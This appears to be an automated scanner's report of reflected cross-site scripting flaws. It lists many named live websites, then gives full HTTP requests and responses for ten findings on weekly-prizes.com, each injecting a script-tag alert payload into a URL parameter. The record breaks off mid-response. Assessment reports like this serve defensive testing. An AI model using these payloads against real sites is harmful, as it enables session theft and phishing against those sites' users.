http://www.battlefieldheroes.com/frontpage/landingPage [REST URL parameter 2]
http://www.battlefieldheroes.com/frontpage/landingPage [name of an arbitrarily supplied request parameter]
http://www.bendbulletin.com/apps/pbcs.dll/article [name of an arbitrarily supplied request parameter]
http://www.bizfind.us/ [name of an arbitrarily supplied request parameter]
http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [name of an arbitrarily supplied request parameter]
http://www.bizfind.us/44/811103/1/attorneys/dallas.aspx [name of an arbitrarily supplied request parameter]
http://www.bizfind.us/cat/44/1/37711/dallas.aspx [name of an arbitrarily supplied request parameter]
http://www.bloggingstocks.com/ [name of an arbitrarily supplied request parameter]
http://www.bloggingstocks.com/ [name of an arbitrarily supplied request parameter]
http://www.cbs.com/primetime/big_bang_theory/video/ [name of an arbitrarily supplied request parameter]
http://www.chamonix.com/press,104,en.html [name of an arbitrarily supplied request parameter]
http://www.cheatscodesguides.com/ [name of an arbitrarily supplied request parameter]
http://www.cheatscodesguides.com/ [name of an arbitrarily supplied request parameter]
http://www.chmedia.com/ [name of an arbitrarily supplied request parameter]
http://www.cofrac.fr/ [name of an arbitrarily supplied request parameter]
http://www.collegehumor.com/cutecollegegirl [REST URL parameter 1]
http://www.collegehumor.com/cutecollegegirl [name of an arbitrarily supplied request parameter]
http://www.csoonline.com/module.htm [leadTaxonomy parameter]
http://www.dailyfinance.com/ [name of an arbitrarily supplied request parameter]
http://www.dailymotion.com/us [name of an arbitrarily supplied request parameter]
http://www.davidcorn.com/ [name of an arbitrarily supplied request parameter]
http://www.dorkly.com/ [name of an arbitrarily supplied request parameter]
http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/ [name of an arbitrarily supplied request parameter]
http://www.emedicinehealth.com/script/main/hp.asp [name of an arbitrarily supplied request parameter]
http://www.fanhouse.com/ [name of an arbitrarily supplied request parameter]
http://www.fanhouse.com/ [name of an arbitrarily supplied request parameter]
http://www.food.com/ [name of an arbitrarily supplied request parameter]
http://www.forex-direkt.de/ [name of an arbitrarily supplied request parameter]
http://www.forex-direkt.de/ [name of an arbitrarily supplied request parameter]
http://www.gamespy.com/ [name of an arbitrarily supplied request parameter]
http://www.gamespy.com/ [name of an arbitrarily supplied request parameter]
http://www.gamestats.com/ [name of an arbitrarily supplied request parameter]
http://www.gamestats.com/ [name of an arbitrarily supplied request parameter]
http://www.giga.de/ [name of an arbitrarily supplied request parameter]
http://www.hidglobal.com/onlineOrderStatusRegistration.php [name of an arbitrarily supplied request parameter]
http://www.hidglobal.com/onlineOrderStatusRegistration.php [name of an arbitrarily supplied request parameter]
http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml [REST URL parameter 1]
http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml [REST URL parameter 1]
http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml [REST URL parameter 2]
http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml [REST URL parameter 2]
http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml [REST URL parameter 3]
http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml [REST URL parameter 3]
http://www.intranetjournal.com/ [name of an arbitrarily supplied request parameter]
http://www.invisionpower.com/index.php [name of an arbitrarily supplied request parameter]
http://www.iso.org/iso/catalogue_detail.htm [name of an arbitrarily supplied request parameter]
http://www.isp-planet.com/about/sitemap.html [name of an arbitrarily supplied request parameter]
http://www.itwhitepapers.com/index.php [REST URL parameter 1]
http://www.itwhitepapers.com/index.php [name of an arbitrarily supplied request parameter]
http://www.japan-guide.com/e/e2164.html [name of an arbitrarily supplied request parameter]
http://www.jazdtech.com/techdirect/ [name of an arbitrarily supplied request parameter]
http://www.jazdtech.com/techdirect/ [name of an arbitrarily supplied request parameter]
http://www.kitchendaily.com/chefs/ [name of an arbitrarily supplied request parameter]
http://www.kledy.co.uk/ [name of an arbitrarily supplied request parameter]
http://www.kledy.de/bookmarks.php [name of an arbitrarily supplied request parameter]
http://www.kledy.es/ [name of an arbitrarily supplied request parameter]
http://www.kledy.eu/ [name of an arbitrarily supplied request parameter]
http://www.kledy.us/ [name of an arbitrarily supplied request parameter]
http://www.klivio.com/ [name of an arbitrarily supplied request parameter]
http://www.linotype.com/ [name of an arbitrarily supplied request parameter]
http://www.liverpoolonlinedegrees.co.uk/2x/prequal.jsp [name of an arbitrarily supplied request parameter]
http://www.luxist.com/ [name of an arbitrarily supplied request parameter]
http://www.luxist.com/ [name of an arbitrarily supplied request parameter]
http://www.mapquesthelp.com/app/answers/detail/a_id/949/ [name of an arbitrarily supplied request parameter]
http://www.marque-nf.com/ [name of an arbitrarily supplied request parameter]
http://www.masstransitmag.com/online/article.jsp [name of an arbitrarily supplied request parameter]
http://www.masstransitmag.com/online/article.jsp [name of an arbitrarily supplied request parameter]
http://www.mittelstandsblog.de/ [name of an arbitrarily supplied request parameter]
http://www.mydaily.com/ [name of an arbitrarily supplied request parameter]
http://www.netvouz.com/ [name of an arbitrarily supplied request parameter]
http://www.newzealand.com/travel/getting-to-around-nz/getting-to-nz/getting-to-nz-home.cfm [name of an arbitrarily supplied request parameter]
http://www.newzealand.com/travel/getting-to-around-nz/getting-to-nz/getting-to-nz-home.cfm [name of an arbitrarily supplied request parameter]
http://www.nydailynews.com/favicon.ico96572' [REST URL parameter 1]
http://www.nydailynews.com/favicon.ico96572' [REST URL parameter 1]
http://www.observer.com/author/rex-reed [REST URL parameter 2]
http://www.observer.com/author/rex-reed [name of an arbitrarily supplied request parameter]
http://www.ohm-chamonix.com/ [name of an arbitrarily supplied request parameter]
http://www.omeda.com/cgi-win/cso.cgi [REST URL parameter 1]
http://www.omeda.com/cgi-win/cso.cgi [REST URL parameter 2]
http://www.omeda.com/cgi-win/cso.cgi [name of an arbitrarily supplied request parameter]
http://www.openforum.com/ [name of an arbitrarily supplied request parameter]
http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [name of an arbitrarily supplied request parameter]
http://www.palmblvd.com/ [name of an arbitrarily supplied request parameter]
http://www.parentdish.com/ [name of an arbitrarily supplied request parameter]
http://www.parkcityinfo.com/visitors/lodging-hotels/ [name of an arbitrarily supplied request parameter]
http://www.pawnation.com/ [name of an arbitrarily supplied request parameter]
http://www.pdastreet.com/ [name of an arbitrarily supplied request parameter]
http://www.peppernews.eu/ [name of an arbitrarily supplied request parameter]
http://www.politicsdaily.com/ [name of an arbitrarily supplied request parameter]
http://www.politicsdaily.com/ [name of an arbitrarily supplied request parameter]
http://www.popeater.com/ [name of an arbitrarily supplied request parameter]
http://www.radioshack.com/uc/index.jsp [name of an arbitrarily supplied request parameter]
http://www.shelterpop.com/ [name of an arbitrarily supplied request parameter]
http://www.shoppinga.de/ [name of an arbitrarily supplied request parameter]
http://www.skiamis.com/catered-search.htm [name of an arbitrarily supplied request parameter]
http://www.slashfood.com/ [name of an arbitrarily supplied request parameter]
http://www.smartphonetoday.com/ [name of an arbitrarily supplied request parameter]
http://www.spiele365.com/ [name of an arbitrarily supplied request parameter]
http://www.sportspickle.com/ [name of an arbitrarily supplied request parameter]
http://www.surf-forecast.com/ [name of an arbitrarily supplied request parameter]
http://www.thecounter.com/ [name of an arbitrarily supplied request parameter]
http://www.thelist.com/ [name of an arbitrarily supplied request parameter]
http://www.thesuperficial.com/sarah-shahi-worlds-sexiest-melding-pot-02-2011/0203-sarah-shahi-07 [name of an arbitrarily supplied request parameter]
http://www.thesuperficial.com/sarah-shahi-worlds-sexiest-melding-pot-02-2011/0203-sarah-shahi-07 [name of an arbitrarily supplied request parameter]
http://www.u-tokyo.ac.jp/index_e.html [name of an arbitrarily supplied request parameter]
http://www.vbforums.com/ [name of an arbitrarily supplied request parameter]
http://www.watchmouse.com/en/ [REST URL parameter 1]
http://www.watchmouse.com/en/ [name of an arbitrarily supplied request parameter]
http://www.webmd.com/click [name of an arbitrarily supplied request parameter]
http://www.wi-fihotspotlist.com/ [name of an arbitrarily supplied request parameter]
http://www.wifesbank.com/ [name of an arbitrarily supplied request parameter]
http://www.worldmastiffforum.com/ [name of an arbitrarily supplied request parameter]
http://www.wovencube.com/ [name of an arbitrarily supplied request parameter]
http://www.wwmt.com/articles/calls-1387029-mubarak-friend.html97f15' [REST URL parameter 2]
http://www.wwmt.com/articles/calls-1387029-mubarak-friend.html97f15' [REST URL parameter 2]
http://www.wwmt.com/articles/calls-1387029-mubarak-friend.html97f15' [name of an arbitrarily supplied request parameter]
http://www.yasni.de/ [name of an arbitrarily supplied request parameter]
http://xhtml.co.il/he/page-700/jQuery [name of an arbitrarily supplied request parameter]
http://xhtml.co.il/ru/page-1013/jQuery.browser [name of an arbitrarily supplied request parameter]
http://ziggymedia.go2cloud.org/aff_c [source parameter]
http://ziggymedia.go2cloud.org/aff_r [aff_id parameter]
http://ziggymedia.go2cloud.org/aff_r [offer_id parameter]
http://ziggymedia.go2cloud.org/aff_r [url parameter]
http://zjmps.com/click/ [a parameter]
http://zones.computerworld.com/ncircle/registration.php [from parameter]
http://zones.computerworld.com/ncircle/registration.php [from parameter]
http://zones.computerworld.com/ncircle/registration.php [src parameter]
http://zones.computerworld.com/ncircle/registration.php [src parameter]
http://zones.computerworld.com/ncircle/registration.php [tab parameter]
http://www.au2m8.com/v/ [Referer HTTP header]
http://www.hidglobal.com/onlineOrderStatusRegistration.php [Referer HTTP header]
http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml [User-Agent HTTP header]
http://www.liverpoolonlinedegrees.co.uk/2x/prequal.jsp [Referer HTTP header]
http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [Referer HTTP header]
http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [Referer HTTP header]
https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header]
http://www.watchmouse.com/en/ [Referer HTTP header]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

3.1. http://weekly-prizes.com/ [aff parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://weekly-prizes.com
Path:	/

Issue detail

The value of the aff request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ced24"><script>alert(1)</script>1330ed82d58 was submitted in the aff parameter. This input was echoed as ced24\"><script>alert(1)</script>1330ed82d58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?aff=154ced24"><script>alert(1)</script>1330ed82d58&subid=&pop=0&r=1&sound=1&sid=1001 HTTP/1.1
Host: weekly-prizes.com
Proxy-Connection: keep-alive
Referer: http://ziggymedia.go2cloud.org/aff_r?offer_id=24&aff_id=1001&url=http%3A%2F%2Fweekly-prizes.com%2F%3Faff%3D154%26subid%3D%26pop%3D0%26r%3D1%26sound%3D1%26sid%3D1001
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:24:38 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.10
X-Powered-By: PHP/5.2.10
Connection: close
Content-Type: text/html
Content-Length: 11309

<html><head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<link rel="Shortcut Icon" href="img/favicon.ico" type="image/x-icon" />
<title>You Are Today's Lucky Winner</title
...[SNIP]...
<a href="http://zjmps.com/click/?a=154ced24\"><script>alert(1)</script>1330ed82d58&o=518&c1=&sid=1001" target="_blank">
...[SNIP]...

3.2. http://weekly-prizes.com/ [sid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://weekly-prizes.com
Path:	/

Issue detail

The value of the sid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload baacb"><script>alert(1)</script>3387eee7817 was submitted in the sid parameter. This input was echoed as baacb\"><script>alert(1)</script>3387eee7817 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?aff=154&subid=&pop=0&r=1&sound=1&sid=1001baacb"><script>alert(1)</script>3387eee7817 HTTP/1.1
Host: weekly-prizes.com
Proxy-Connection: keep-alive
Referer: http://ziggymedia.go2cloud.org/aff_r?offer_id=24&aff_id=1001&url=http%3A%2F%2Fweekly-prizes.com%2F%3Faff%3D154%26subid%3D%26pop%3D0%26r%3D1%26sound%3D1%26sid%3D1001
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:24:39 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.10
X-Powered-By: PHP/5.2.10
Connection: close
Content-Type: text/html
Content-Length: 11309

<html><head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<link rel="Shortcut Icon" href="img/favicon.ico" type="image/x-icon" />
<title>You Are Today's Lucky Winner</title
...[SNIP]...
<a href="http://zjmps.com/click/?a=154&o=518&c1=&sid=1001baacb\"><script>alert(1)</script>3387eee7817" target="_blank">
...[SNIP]...

3.3. http://weekly-prizes.com/ [subid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://weekly-prizes.com
Path:	/

Issue detail

The value of the subid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a7a0"><script>alert(1)</script>fe3a725c195 was submitted in the subid parameter. This input was echoed as 9a7a0\"><script>alert(1)</script>fe3a725c195 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?aff=154&subid=9a7a0"><script>alert(1)</script>fe3a725c195&pop=0&r=1&sound=1&sid=1001 HTTP/1.1
Host: weekly-prizes.com
Proxy-Connection: keep-alive
Referer: http://ziggymedia.go2cloud.org/aff_r?offer_id=24&aff_id=1001&url=http%3A%2F%2Fweekly-prizes.com%2F%3Faff%3D154%26subid%3D%26pop%3D0%26r%3D1%26sound%3D1%26sid%3D1001
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:24:38 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.10
X-Powered-By: PHP/5.2.10
Connection: close
Content-Type: text/html
Content-Length: 11309

<html><head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<link rel="Shortcut Icon" href="img/favicon.ico" type="image/x-icon" />
<title>You Are Today's Lucky Winner</title
...[SNIP]...
<a href="http://zjmps.com/click/?a=154&o=518&c1=9a7a0\"><script>alert(1)</script>fe3a725c195&sid=1001" target="_blank">
...[SNIP]...

3.4. http://weekly-prizes.com/1-frame.php [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://weekly-prizes.com
Path:	/1-frame.php

Issue detail

The value of the c request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a0e8"><script>alert(1)</script>e4e5024fcd1 was submitted in the c parameter. This input was echoed as 5a0e8\"><script>alert(1)</script>e4e5024fcd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1-frame.php?subid=154&sid=&c=us5a0e8"><script>alert(1)</script>e4e5024fcd1&tt= HTTP/1.1
Host: weekly-prizes.com
Proxy-Connection: keep-alive
Referer: http://weekly-prizes.com/1.php?c=us&subid=154
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 14:21:05 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.10
X-Powered-By: PHP/5.2.10
Content-Length: 7464
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://cdn.weekly-pr
...[SNIP]...
<input name="c" type="hidden" id="c" value="us5a0e8\"><script>alert(1)</script>e4e5024fcd1" />
...[SNIP]...

3.5. http://weekly-prizes.com/1-frame.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://weekly-prizes.com
Path:	/1-frame.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f1cf"><script>alert(1)</script>4fecb2bd1c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1f1cf\"><script>alert(1)</script>4fecb2bd1c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1-frame.php?subid=154&sid=&c=us/1f1cf"><script>alert(1)</script>4fecb2bd1c4&tt= HTTP/1.1
Host: weekly-prizes.com
Proxy-Connection: keep-alive
Referer: http://weekly-prizes.com/1.php?c=us&subid=154
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 14:21:06 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.10
X-Powered-By: PHP/5.2.10
Content-Length: 7465
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://cdn.weekly-pr
...[SNIP]...
<input name="c" type="hidden" id="c" value="us/1f1cf\"><script>alert(1)</script>4fecb2bd1c4" />
...[SNIP]...

3.6. http://weekly-prizes.com/1-frame.php [sid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://weekly-prizes.com
Path:	/1-frame.php

Issue detail

The value of the sid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbff3"><script>alert(1)</script>5e5ff89463a was submitted in the sid parameter. This input was echoed as fbff3\"><script>alert(1)</script>5e5ff89463a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1-frame.php?subid=154&sid=fbff3"><script>alert(1)</script>5e5ff89463a&c=us&tt= HTTP/1.1
Host: weekly-prizes.com
Proxy-Connection: keep-alive
Referer: http://weekly-prizes.com/1.php?c=us&subid=154
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 14:21:04 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.10
X-Powered-By: PHP/5.2.10
Content-Length: 7464
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://cdn.weekly-pr
...[SNIP]...
<input name="sid" type="hidden" id="sid" value="fbff3\"><script>alert(1)</script>5e5ff89463a" />
...[SNIP]...

3.7. http://weekly-prizes.com/1-frame.php [subid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://weekly-prizes.com
Path:	/1-frame.php

Issue detail

The value of the subid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74452"><script>alert(1)</script>f2433208b93 was submitted in the subid parameter. This input was echoed as 74452\"><script>alert(1)</script>f2433208b93 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1-frame.php?subid=15474452"><script>alert(1)</script>f2433208b93&sid=&c=us&tt= HTTP/1.1
Host: weekly-prizes.com
Proxy-Connection: keep-alive
Referer: http://weekly-prizes.com/1.php?c=us&subid=154
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 14:21:04 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.10
X-Powered-By: PHP/5.2.10
Content-Length: 7464
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://cdn.weekly-pr
...[SNIP]...
<input name="subid" type="hidden" id="subid" value="15474452\"><script>alert(1)</script>f2433208b93" />
...[SNIP]...

3.8. http://weekly-prizes.com/1.php [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://weekly-prizes.com
Path:	/1.php

Issue detail

The value of the c request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 668af'><script>alert(1)</script>51f185bb0fc was submitted in the c parameter. This input was echoed as 668af\'><script>alert(1)</script>51f185bb0fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1.php?c=668af'><script>alert(1)</script>51f185bb0fc&subid=154 HTTP/1.1
Host: weekly-prizes.com
Proxy-Connection: keep-alive
Referer: http://zjmps.com/click/?a=154&o=518&c1=js_sound2909d\
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 14:21:04 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.10
X-Powered-By: PHP/5.2.10
Content-Length: 2263
Connection: close
Content-Type: text/html

<html><head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<link rel="Shortcut Icon" href="img/favicon.ico" type="image/x-icon" />
<title>You Are Today's Lucky Winner</title
...[SNIP]...
<iframe src='1-frame.php?subid=154&sid=&c=668af\'><script>alert(1)</script>51f185bb0fc&tt=' width="100%" height="900" scrolling="no" frameborder="0">
...[SNIP]...

3.9. http://weekly-prizes.com/1.php [subid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://weekly-prizes.com
Path:	/1.php

Issue detail

The value of the subid request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 17f81'><script>alert(1)</script>80c5a12b590 was submitted in the subid parameter. This input was echoed as 17f81\'><script>alert(1)</script>80c5a12b590 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1.php?c=us&subid=17f81'><script>alert(1)</script>80c5a12b590 HTTP/1.1
Host: weekly-prizes.com
Proxy-Connection: keep-alive
Referer: http://zjmps.com/click/?a=154&o=518&c1=js_sound2909d\
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 14:21:05 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.10
X-Powered-By: PHP/5.2.10
Content-Length: 2303
Connection: close
Content-Type: text/html

<html><head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<link rel="Shortcut Icon" href="img/favicon.ico" type="image/x-icon" />
<title>You Are Today's Lucky Winner</title
...[SNIP]...
<iframe src='1-frame.php?subid=17f81\'><script>alert(1)</script>80c5a12b590&sid=&c=us&tt=' width="100%" height="900" scrolling="no" frameborder="0">
...[SNIP]...

3.10. http://weekly-prizes.com/1.php [subid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://weekly-prizes.com
Path:	/1.php

Issue detail

The value of the subid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ea28"><script>alert(1)</script>a9d824969dc was submitted in the subid parameter. This input was echoed as 8ea28\"><script>alert(1)</script>a9d824969dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1.php?c=us&subid=1548ea28"><script>alert(1)</script>a9d824969dc HTTP/1.1
Host: weekly-prizes.com
Proxy-Connection: keep-alive
Referer: http://zjmps.com/click/?a=154&o=518&c1=js_sound2909d\
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 14:21:04 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.10
X-Powered-By: PHP/5.2.10
Content-Length: 2309
Connection: close
Content-Type: text/html

<html><head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<link rel="Shortcut Icon" href="img/favicon.ico" type="image/x-icon" />
